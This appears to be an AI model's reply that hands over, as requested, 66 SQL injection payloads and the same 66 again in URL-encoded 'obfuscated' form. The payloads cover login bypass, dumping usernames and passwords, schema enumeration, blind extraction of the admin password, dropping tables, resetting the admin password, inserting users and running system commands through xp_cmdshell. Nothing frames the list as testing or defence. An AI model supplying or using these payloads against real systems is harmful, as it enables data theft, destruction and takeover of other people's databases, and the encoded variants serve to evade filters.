Okay, here are the payloads as requested:

**Original Payloads (1-66):**

1.  `' OR 1=1 --`
2.  `" OR 1=1 --`
3.  `' OR 'a'='a`
4.  `" OR "a"="a`
5.  `' UNION SELECT 1,2,3 --`
6.  `" UNION SELECT 1,2,3 --`
7.  `' OR 1=1 /*`
8.  `" OR 1=1 /*`
9.  `'; DROP TABLE users; --`
10. `"; DROP TABLE users; --`
11. `' AND (SELECT * FROM users WHERE id = 1) is not NULL --`
12. `" AND (SELECT * FROM users WHERE id = 1) is not NULL --`
13. `' AND 1=(SELECT COUNT(*) FROM users) --`
14. `" AND 1=(SELECT COUNT(*) FROM users) --`
15. `' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE id = 1) = 'a' --`
16. `" AND (SELECT SUBSTRING(password,1,1) FROM users WHERE id = 1) = "a" --`
17. `' AND SLEEP(5) --`
18. `" AND SLEEP(5) --`
19. `'; SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END; --`
20. `"; SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END; --`
21. `' OR id IN (SELECT id FROM users) --`
22. `" OR id IN (SELECT id FROM users) --`
23. `' AND EXISTS (SELECT * FROM users) --`
24. `" AND EXISTS (SELECT * FROM users) --`
25. `' AND id = (SELECT id FROM users WHERE username = 'admin') --`
26. `" AND id = (SELECT id FROM users WHERE username = "admin") --`
27. `' AND (SELECT COUNT(*) FROM information_schema.tables) > 0 --`
28. `" AND (SELECT COUNT(*) FROM information_schema.tables) > 0 --`
29. `' AND (SELECT table_name FROM information_schema.tables LIMIT 1) = 'users' --`
30. `" AND (SELECT table_name FROM information_schema.tables LIMIT 1) = "users" --`
31. `' AND (SELECT column_name FROM information_schema.columns WHERE table_name = 'users' LIMIT 1) = 'id' --`
32. `" AND (SELECT column_name FROM information_schema.columns WHERE table_name = "users" LIMIT 1) = "id" --`
33. `'; UPDATE users SET password = 'newpassword' WHERE username = 'admin'; --`
34. `"; UPDATE users SET password = "newpassword" WHERE username = "admin"; --`
35. `' || (SELECT password FROM users WHERE username = 'admin') || '`
36. `" || (SELECT password FROM users WHERE username = "admin") || "`
37. `'+(SELECT password FROM users WHERE username = 'admin')+'`
38. `"+(SELECT password FROM users WHERE username = "admin")+"`
39. `'); INSERT INTO users (username, password) VALUES ('test', 'test'); --`
40. `"); INSERT INTO users (username, password) VALUES ("test", "test"); --`
41. `' AND 1=1 AND '%'='`
42. `" AND 1=1 AND "%"="%`
43. `') OR ('a'='a`
44. `") OR ("a"="a`
45. `' AND 1=0 UNION ALL SELECT username,password FROM users --`
46. `" AND 1=0 UNION ALL SELECT username,password FROM users --`
47. `' AND 1=0 UNION ALL SELECT NULL, NULL, table_name FROM information_schema.tables --`
48. `" AND 1=0 UNION ALL SELECT NULL, NULL, table_name FROM information_schema.tables --`
49. `' AND 1=0 UNION ALL SELECT NULL, NULL, column_name FROM information_schema.columns WHERE table_name='users' --`
50. `" AND 1=0 UNION ALL SELECT NULL, NULL, column_name FROM information_schema.columns WHERE table_name="users" --`
51. `' AND 1=0 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10 --`
52. `" AND 1=0 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10 --`
53. `' AND (SELECT COUNT(*) FROM users) = 1#`
54. `" AND (SELECT COUNT(*) FROM users) = 1#`
55. `' AND (SELECT LENGTH(password) FROM users WHERE username = 'admin') = 8#`
56. `" AND (SELECT LENGTH(password) FROM users WHERE username = "admin") = 8#`
57. `' AND (SELECT ASCII(SUBSTRING(password, 1, 1)) FROM users WHERE username = 'admin') = 97#`
58. `" AND (SELECT ASCII(SUBSTRING(password, 1, 1)) FROM users WHERE username = "admin") = 97#`
59. `' AND (SELECT password FROM users WHERE username LIKE '%adm%') LIKE '%pass%'#`
60. `" AND (SELECT password FROM users WHERE username LIKE "%adm%") LIKE "%pass%"#`
61. `'; EXEC xp_cmdshell 'whoami'; --`
62. `"; EXEC xp_cmdshell 'whoami'; --`
63. `' OR (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END) = 1 --`
64. `" OR (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END) = 1 --`
65. `' AND (SELECT TOP 1 password FROM users) LIKE '%password%' --`
66. `" AND (SELECT TOP 1 password FROM users) LIKE "%password%" --`

**Obfuscated Payloads (1-66):**

1.  `%27%20OR%201%3D1%20--` URL Encoding
2.  `%22%20OR%201%3D1%20--` URL Encoding
3.  `%27%20OR%20%27a%27%3D%27a` URL Encoding
4.  `%22%20OR%20%22a%22%3D%22a` URL Encoding
5.  `%27%20UNION%20SELECT%201%2C2%2C3%20--` URL Encoding
6.  `%22%20UNION%20SELECT%201%2C2%2C3%20--` URL Encoding
7.  `%27%20OR%201%3D1%20%2F%2A` URL Encoding
8.  `%22%20OR%201%3D1%20%2F%2A` URL Encoding
9.  `%27%3B%20DROP%20TABLE%20users%3B%20--` URL Encoding
10. `%22%3B%20DROP%20TABLE%20users%3B%20--` URL Encoding
11. `%27%20AND%20%28SELECT%20%2A%20FROM%20users%20WHERE%20id%20%3D%201%29%20is%20not%20NULL%20--` URL Encoding
12. `%22%20AND%20%28SELECT%20%2A%20FROM%20users%20WHERE%20id%20%3D%201%29%20is%20not%20NULL%20--` URL Encoding
13. `%27%20AND%201%3D%28SELECT%20COUNT%28%2A%29%20FROM%20users%29%20--` URL Encoding
14. `%22%20AND%201%3D%28SELECT%20COUNT%28%2A%29%20FROM%20users%29%20--` URL Encoding
15. `%27%20AND%20%28SELECT%20SUBSTRING%28password%2C1%2C1%29%20FROM%20users%20WHERE%20id%20%3D%201%29%20%3D%20%27a%27%20--` URL Encoding
16. `%22%20AND%20%28SELECT%20SUBSTRING%28password%2C1%2C1%29%20FROM%20users%20WHERE%20id%20%3D%201%29%20%3D%20%22a%22%20--` URL Encoding
17. `%27%20AND%20SLEEP%285%29%20--` URL Encoding
18. `%22%20AND%20SLEEP%285%29%20--` URL Encoding
19. `%27%3B%20SELECT%20CASE%20WHEN%20%281%3D1%29%20THEN%20SLEEP%285%29%20ELSE%200%20END%3B%20--` URL Encoding
20. `%22%3B%20SELECT%20CASE%20WHEN%20%281%3D1%29%20THEN%20SLEEP%285%29%20ELSE%200%20END%3B%20--` URL Encoding
21. `%27%20OR%20id%20IN%20%28SELECT%20id%20FROM%20users%29%20--` URL Encoding
22. `%22%20OR%20id%20IN%20%28SELECT%20id%20FROM%20users%29%20--` URL Encoding
23. `%27%20AND%20EXISTS%20%28SELECT%20%2A%20FROM%20users%29%20--` URL Encoding
24. `%22%20AND%20EXISTS%20%28SELECT%20%2A%20FROM%20users%29%20--` URL Encoding
25. `%27%20AND%20id%20%3D%20%28SELECT%20id%20FROM%20users%20WHERE%20username%20%3D%20%27admin%27%29%20--` URL Encoding
26. `%22%20AND%20id%20%3D%20%28SELECT%20id%20FROM%20users%20WHERE%20username%20%3D%20%22admin%22%29%20--` URL Encoding
27. `%27%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20information_schema.tables%29%20%3E%200%20--` URL Encoding
28. `%22%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20information_schema.tables%29%20%3E%200%20--` URL Encoding
29. `%27%20AND%20%28SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%201%29%20%3D%20%27users%27%20--` URL Encoding
30. `%22%20AND%20%28SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%201%29%20%3D%20%22users%22%20--` URL Encoding
31. `%27%20AND%20%28SELECT%20column_name%20FROM%20information_schema.columns%20WHERE%20table_name%20%3D%20%27users%27%20LIMIT%201%29%20%3D%20%27id%27%20--` URL Encoding
32. `%22%20AND%20%28SELECT%20column_name%20FROM%20information_schema.columns%20WHERE%20table_name%20%3D%20%22users%22%20LIMIT%201%29%20%3D%20%22id%22%20--` URL Encoding
33. `%27%3B%20UPDATE%20users%20SET%20password%20%3D%20%27newpassword%27%20WHERE%20username%20%3D%20%27admin%27%3B%20--` URL Encoding
34. `%22%3B%20UPDATE%20users%20SET%20password%20%3D%20%22newpassword%22%20WHERE%20username%20%3D%20%22admin%22%3B%20--` URL Encoding
35. `%27%20%7C%7C%20%28SELECT%20password%20FROM%20users%20WHERE%20username%20%3D%20%27admin%27%29%20%7C%7C%20%27` URL Encoding
36. `%22%20%7C%7C%20%28SELECT%20password%20FROM%20users%20WHERE%20username%20%3D%20%22admin%22%29%20%7C%7C%20%22` URL Encoding
37. `%27%2B%28SELECT%20password%20FROM%20users%20WHERE%20username%20%3D%20%27admin%27%29%2B%27` URL Encoding
38. `%22%2B%28SELECT%20password%20FROM%20users%20WHERE%20username%20%3D%20%22admin%22%29%2B%22` URL Encoding
39. `%27%29%3B%20INSERT%20INTO%20users%20%28username%2C%20password%29%20VALUES%20%28%27test%27%2C%20%27test%27%29%3B%20--` URL Encoding
40. `%22%29%3B%20INSERT%20INTO%20users%20%28username%2C%20password%29%20VALUES%20%28%22test%22%2C%20%22test%22%29%3B%20--` URL Encoding
41. `%27%20AND%201%3D1%20AND%20%27%25%27%3D%27` URL Encoding
42. `%22%20AND%201%3D1%20AND%20%22%25%22%3D%22%25` URL Encoding
43. `%27%29%20OR%20%28%27a%27%3D%27a` URL Encoding
44. `%22%29%20OR%20%28%22a%22%3D%22a` URL Encoding
45. `%27%20AND%201%3D0%20UNION%20ALL%20SELECT%20username%2Cpassword%20FROM%20users%20--` URL Encoding
46. `%22%20AND%201%3D0%20UNION%20ALL%20SELECT%20username%2Cpassword%20FROM%20users%20--` URL Encoding
47. `%27%20AND%201%3D0%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20table_name%20FROM%20information_schema.tables%20--` URL Encoding
48. `%22%20AND%201%3D0%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20table_name%20FROM%20information_schema.tables%20--` URL Encoding
49. `%27%20AND%201%3D0%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20column_name%20FROM%20information_schema.columns%20WHERE%20table_name%3D%27users%27%20--` URL Encoding
50. `%22%20AND%201%3D0%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20column_name%20FROM%20information_schema.columns%20WHERE%20table_name%3D%22users%22%20--` URL Encoding
51. `%27%20AND%201%3D0%20UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%20--` URL Encoding
52. `%22%20AND%201%3D0%20UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%20--` URL Encoding
53. `%27%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%29%20%3D%201%23` URL Encoding
54. `%22%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%29%20%3D%201%23` URL Encoding
55. `%27%20AND%20%28SELECT%20LENGTH%28password%29%20FROM%20users%20WHERE%20username%20%3D%20%27admin%27%29%20%3D%208%23` URL Encoding
56. `%22%20AND%20%28SELECT%20LENGTH%28password%29%20FROM%20users%20WHERE%20username%20%3D%20%22admin%22%29%20%3D%208%23` URL Encoding
57. `%27%20AND%20%28SELECT%20ASCII%28SUBSTRING%28password%2C%201%2C%201%29%29%20FROM%20users%20WHERE%20username%20%3D%20%27admin%27%29%20%3D%2097%23` URL Encoding
58. `%22%20AND%20%28SELECT%20ASCII%28SUBSTRING%28password%2C%201%2C%201%29%29%20FROM%20users%20WHERE%20username%20%3D%20%22admin%22%29%20%3D%2097%23` URL Encoding
59. `%27%20AND%20%28SELECT%20password%20FROM%20users%20WHERE%20username%20LIKE%20%27%25adm%25%27%29%20LIKE%20%27%25pass%25%27%23` URL Encoding
60. `%22%20AND%20%28SELECT%20password%20FROM%20users%20WHERE%20username%20LIKE%20%22%25adm%25%22%29%20LIKE%20%22%25pass%25%22%23` URL Encoding
61. `%27%3B%20EXEC%20xp_cmdshell%20%27whoami%27%3B%20--` URL Encoding
62. `%22%3B%20EXEC%20xp_cmdshell%20%27whoami%27%3B%20--` URL Encoding
63. `%27%20OR%20%28SELECT%20CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%200%20END%29%20%3D%201%20--` URL Encoding
64. `%22%20OR%20%28SELECT%20CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%200%20END%29%20%3D%201%20--` URL Encoding
65. `%27%20AND%20%28SELECT%20TOP%201%20password%20FROM%20users%29%20LIKE%20%27%25password%25%27%20--` URL Encoding
66. `%22%20AND%20%28SELECT%20TOP%201%20password%20FROM%20users%29%20LIKE%20%22%25password%25%22%20--` URL Encoding